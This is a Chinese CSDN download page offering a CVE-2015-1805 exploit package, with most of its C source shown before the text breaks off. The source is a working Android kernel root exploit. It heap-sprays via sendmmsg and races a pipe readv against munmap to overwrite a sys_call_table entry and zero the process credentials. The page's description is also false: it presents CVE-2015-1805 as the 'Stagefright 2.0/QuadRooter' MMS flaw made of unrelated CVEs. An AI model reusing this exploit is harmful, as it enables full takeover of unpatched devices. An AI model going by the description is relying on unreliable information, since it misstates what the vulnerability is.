CVE-2015-1805漏洞验证_CVE-2015-1830"复现资源-CSDN文库

共7个文件

mk：2个

exploit：2个

o：1个

需积分: 50 195 浏览量 2018-05-17 15:04:27 上传评论收藏 48KB ZIP 举报

**CVE-2015-1805漏洞详解** CVE-2015-1805，也被称为“Stagefright 2.0”或“QuadRooter”，是Android操作系统中的一个严重安全漏洞。这个漏洞存在于Android的多媒体处理框架中，允许攻击者通过恶意MMS（ Multimedia Messaging Service）消息或者特制的媒体文件来执行远程代码，从而对设备进行控制。此漏洞在2015年被公开，影响了当时大量Android设备，由于其影响深远，引发了广泛关注。 **漏洞成因** CVE-2015-1805主要涉及四个独立的漏洞，它们都与Android系统中的MediaServer服务有关，MediaServer服务负责处理音频、视频等多媒体数据。这四个漏洞分别是： 1. CVE-2015-1800：这是一个内存损坏漏洞，攻击者可以通过发送恶意的AMR音频文件，导致MediaServer服务崩溃，甚至可能实现远程代码执行。 2. CVE-2015-3864：此漏洞源于解码某些媒体文件时的缓冲区溢出，可能导致服务崩溃或权限提升。 3. CVE-2015-3876：此问题存在于音频编解码器中，攻击者可以利用此漏洞触发内存破坏，实现远程代码执行。 4. CVE-2015-3877：这是另一个与媒体处理相关的内存溢出漏洞，同样可能导致服务崩溃和权限提升。这些漏洞共同构成了“Stagefright 2.0”攻击，使得攻击者无需用户交互就能触发，仅需接收或者预览恶意的MMS消息就可能导致设备受损。 **攻击过程** 攻击者通常会向目标设备发送一条包含恶意媒体文件的MMS消息。由于Android系统默认会自动处理这些消息，即使用户未查看，恶意代码也可能被执行。一旦成功，攻击者可以获取设备的root权限，完全控制受害者的手机，包括窃取个人信息、安装后门程序、监控用户行为，甚至利用设备发起进一步的网络攻击。 **漏洞验证** 在描述中提到的"漏洞验证"是指确认设备是否受到CVE-2015-1805漏洞的影响。通常，这需要通过专门的工具或测试用例来完成。提供的"exploit"文件可能是用于测试漏洞的代码或脚本。安全研究人员和系统管理员会使用这样的工具来检测他们的设备是否易受攻击，并采取相应的安全措施，如更新系统、安装补丁或应用安全策略。 **防范措施** 为防止遭受CVE-2015-1805攻击，用户和组织应采取以下措施： 1. **保持系统更新**：及时安装来自设备制造商的系统更新，特别是安全补丁，以修复漏洞。 2. **禁用自动下载MMS**：修改设置，避免系统自动下载或预览MMS消息，直到确认消息来源的安全性。 3. **安装安全应用**：使用安全软件可以帮助检测和阻止恶意消息。 4. **谨慎处理未知来源的消息**：不要打开来自不明身份或不可信来源的多媒体消息。 CVE-2015-1805是一个严重威胁Android设备安全的漏洞，及时的漏洞验证和有效的防范措施对于保护个人和企业数据至关重要。在网络安全日益重要的今天，对这类漏洞的了解和防御能力是每个用户和IT专业人员必备的知识。

资源推荐

资源详情

资源评论

收起资源包目录

CVE-2015-1805Exploit.zip （7个子文件）

exploit

jni

Application.mk 50B

Android.mk 240B

exploit.c 9KB

libs

armeabi-v7a

exploit 13KB

obj

local

armeabi-v7a

objs

exploit

exploit.o 23KB

exploit.o.d 13KB

exploit 52KB

//#define _GNU_SOURCE #include <pthread.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <netinet/ip.h> #include <sys/mman.h> #include <sys/uio.h> #include <sys/resource.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <sys/utsname.h> #include<sys/prctl.h> //这个值必须填写对 //nexus4 4.4 //c000db28 T sys_call_table #define SYS_CALL_TABLE 0xc000db28 struct mem_t { int mem_addr; int mem_size; int mem_mmaped; int un; }; struct mem_t g_mapped[0x200]; struct iovec g_iovecs_read[0x200]; int get_current_task() { int i_ret; int i; i_ret = *(int *)(((unsigned int)&i & 0xFFFFE000) + 0xC); return i_ret; } int set_task_root() { int i_task; // r1@1 int v1; // r2@6 int result; // r0@6 int v3; // [sp+0h] [bp-28h]@1 i_task = get_current_task(); do { i_task += 4; } while ( strcmp((char *)i_task ,"QQAA")!=0); v1 = *(int *)(i_task - 8) + 4; *(int *)v1 = 0; *(int *)(v1 + 16) = 0; *(int *)(v1 + 8) = 0; *(int *)(v1 + 4) = 0; *(int *)(v1 + 20) = 0; *(int *)(v1 + 12) = 0; *(int *)(v1 + 36) = -1; *(int *)(v1 + 40) = -1; *(int *)(v1 + 44) = -1; *(int *)(v1 + 48) = -1; *(int *)(v1 + 52) = -1; *(int *)(v1 + 56) = -1; *(int *)(v1 + 60) = -1; *(int *)(v1 + 64) = -1; result = 0xa; return result; } void do_root() { set_task_root(); } int init_payloads() { int i , i_ret ; int addr; int mmap_addr; //初始化提权内存结构代码 //构造管道读触发BUG 的结构 //当调用pipe_read-》pipe_iov_copy_to_user 内核函数时 g_iovecs_read[2]已经被unmap 引发错误重新走redo路径 //这时必须把g_iovecs_read[2] 的内存地址重新MAP好，，让流程继续走下去 //g_iovecs_read 的总缓存大小为 (0x200-2)*8+0x20 = 0x1010 刚好一个页多一点点如果堆喷到下一个页那么就成功 //后面的这个0x10 刚好是2组iovec 第一组是写的内核目标地址，第二组是3环的地址，用来判断漏洞是否调用成功 for (i = 0; i < 0x200; i++) { addr = 0x40000000 + (i << 12); g_mapped[i].mem_addr = addr; g_mapped[i].mem_size = 0x1000; mmap_addr = (int)mmap((void*)addr, 0x1000,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0); g_mapped[i].mem_mmaped = mmap_addr; g_iovecs_read[i].iov_base = (void*)mmap_addr; //这个地方i=2前后项取不同值，是为了调整时间片段，尽可能的让漏洞触发 //这个值地方是可以未调，来适配速度慢与快的机器，提高漏洞触发成功率 if (i == 0) { g_iovecs_read[i].iov_len = 0; } else if (i == 1) { g_iovecs_read[i].iov_len = 0x20; } else { g_iovecs_read[i].iov_len = 0x8; } } return 1; } struct data_write { int un1; //1 int un2; //0 int offsets[0x10]; }; struct data_write data_write_; pthread_mutex_t g_mutex_read_msg; void* read_msg(void* fd) { int ret; static int count = 0; //等待主线程把 g_mapped[2].mem_mmaped unmap释放掉在运行readv函数 //这里有竞争关机，，触发漏洞关键点 pthread_mutex_lock(&g_mutex_read_msg); readv((int)fd, g_iovecs_read, 0x200); if ((count % 0x50) == 0) { count++; } ret = pthread_mutex_unlock(&g_mutex_read_msg); pthread_exit((void*)ret); } struct mmsghdr { struct msghdr msg_hdr; unsigned msg_len; }; struct sockaddr g_addr_socket_sendmsg; //建立消息堆喷的接受服务器 void create_sendmsg_server() { int fd_socket = socket(2, 2, 0); if (fd_socket < 0) { perror("failed socket"); exit(2); } *(int*)&g_addr_socket_sendmsg.sa_family = 0xF1130002; *(int*)&g_addr_socket_sendmsg.sa_data[2] = 0x100007F; if (bind(fd_socket, &g_addr_socket_sendmsg, sizeof(struct sockaddr)) == -1) { perror("failed bind"); exit(2); } } struct iovec iovecs_write[0x200]; int g_stop_send = 0; //用来做堆喷的线程 //利用sendmesg做内核堆喷 void* thread_write_msg(void* argv) { int i_ret = 0; int fd_sock; struct mmsghdr msg; //printf("------------------%s-----------------\n", __func__); fd_sock = socket(2, 2, 0); if (fd_sock != -1) { if (connect(fd_sock, &g_addr_socket_sendmsg, sizeof(struct sockaddr)) != -1) { msg.msg_hdr.msg_iov = iovecs_write; msg.msg_hdr.msg_iovlen = 0x200; msg.msg_hdr.msg_control = iovecs_write; msg.msg_hdr.msg_controllen = (0x200 * sizeof(struct iovec)); while (!g_stop_send) { i_ret = syscall(374/*__NR_sendmmsg*/, fd_sock, &msg, 1, 0); } } } close(fd_sock); pthread_exit(0); } void* g_offset_0x30000000; //堆喷函数 int do_sendmsg_HeapSpray(int edit_addr) { int i ; void*status; pthread_t threads[256]; create_sendmsg_server(); //创建一块内存区域。。可以用来检测漏洞是否成功执行 g_offset_0x30000000 = mmap((void*)0x30000000, 0x2000,PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0); if ((int)g_offset_0x30000000 != 0x30000000) { return 0; } memset(g_offset_0x30000000, 0x2000, 0); *(int*)g_offset_0x30000000 = -1; //构建堆喷如果漏洞成功产生越界访问那么就会往0x30000000 写值iov_len的值 for (i = 0; i < 0x200; i++) { iovecs_write[i].iov_base = (void*)0x30000000; iovecs_write[i].iov_len = 0x1000; } iovecs_write[0].iov_len = 0; iovecs_write[0x100].iov_len = 0; iovecs_write[1].iov_base = (void*)edit_addr; //触发后修改内核的值 iovecs_write[1].iov_len = 0x10; //修改长度 iovecs_write[0x101].iov_base = (void*)edit_addr; iovecs_write[0x101].iov_len = 0x10; //创建函数做堆喷 for (i = 0; i < 256; i++) { if (pthread_create(&threads[i], NULL, thread_write_msg, NULL)) { return 0; } } sleep(5); g_stop_send = 1; for (i = 0; i < 256; i++) { pthread_join(threads[i], &status); } g_stop_send = 0; //这个线程不会关闭一直做喷射状态 for (i = 0; i <= 1; i++) { if (pthread_create(&threads[i], NULL, thread_write_msg, NULL)) { return 0; } } return 1; } int main(int argc, char* argv[],char *env[]) { int i , j , i_ret = 0 , i_root_pid = 0; void * status; char * p_sh = NULL; int fd_pipe[2]; char buf_read[0x1000]; pthread_t thread_read; int fdsocket = 0; //修改的内核值 int i_edit_addr = SYS_CALL_TABLE + 271 * 4; //修改成我们需要调用的函数 int i_edit_values = (int)do_root; printf("edit addr : %x\r\n",i_edit_addr); printf("edit values : %x\r\n",i_edit_values); printf("-------------star---------------------\n"); init_payloads(); //开始堆喷 if (do_sendmsg_HeapSpray(i_edit_addr) == 0) { printf("do_sendmsg_HeapSpray is error\r\n"); goto exit_error; } //同时多进程触发漏洞提高漏洞触发几率 i_root_pid = getpid(); fork(); fork(); fork(); //用来做函数指针提权的 for (i = 0; i < 0x10; i++) { data_write_.offsets[i] = i_edit_values; } data_write_.un2 = i_edit_values; i_ret = 0; while (*(int*)g_offset_0x30000000 == -1) { if (pipe(fd_pipe) == -1) { printf("pipe is error!!!\n"); break; } fcntl(fd_pipe[0], 4, 2048); fcntl(fd_pipe[1], 4, 2048); g_mutex_read_msg.value = 0; //写0x3000个字节 j = 192; do { //往管道里面无限写do_root函数的地址，目的是为了触发漏洞后，可以往我们指定的内存写这个值每次写0x40个字节 write(fd_pipe[1], data_write_.offsets, 0x40); j--; } while (j); //读取一次管道的值，读0x40个字节 //这行是必须的，删除掉漏洞触发不成功这里是为了后面第3次调用 //chars 取值本来是 0x1000 但是调用这里后 chars = 0xfc0 read(fd_pipe[0], buf_read, 0x40); //互斥体是为了线程的同步 pthread_mutex_lock(&g_mutex_read_msg); //创建线程调用 readv 从管道里面读取出0x200组值加起来长度为0x1010 pthread_create(&thread_read, NULL, read_msg, (void*)fd_pipe[0]); //这里是为了等待线程里面的readv函数最好准备 usleep(100); //这里特别注意在解锁前线程里面的readv函数其实是还没有进入的，， //解锁了以后紧接着调用munmap函数为了让pipe_read函数触发漏洞 //但是马上又需要再次把这块内存给map回去，，让程序可以正常往下走 //这里是一个原子操作，，这里是能否触发漏洞的关键点 pthread_mutex_unlock(&g_mutex_read_msg); munmap((void*)g_mapp

评论收藏

内容反馈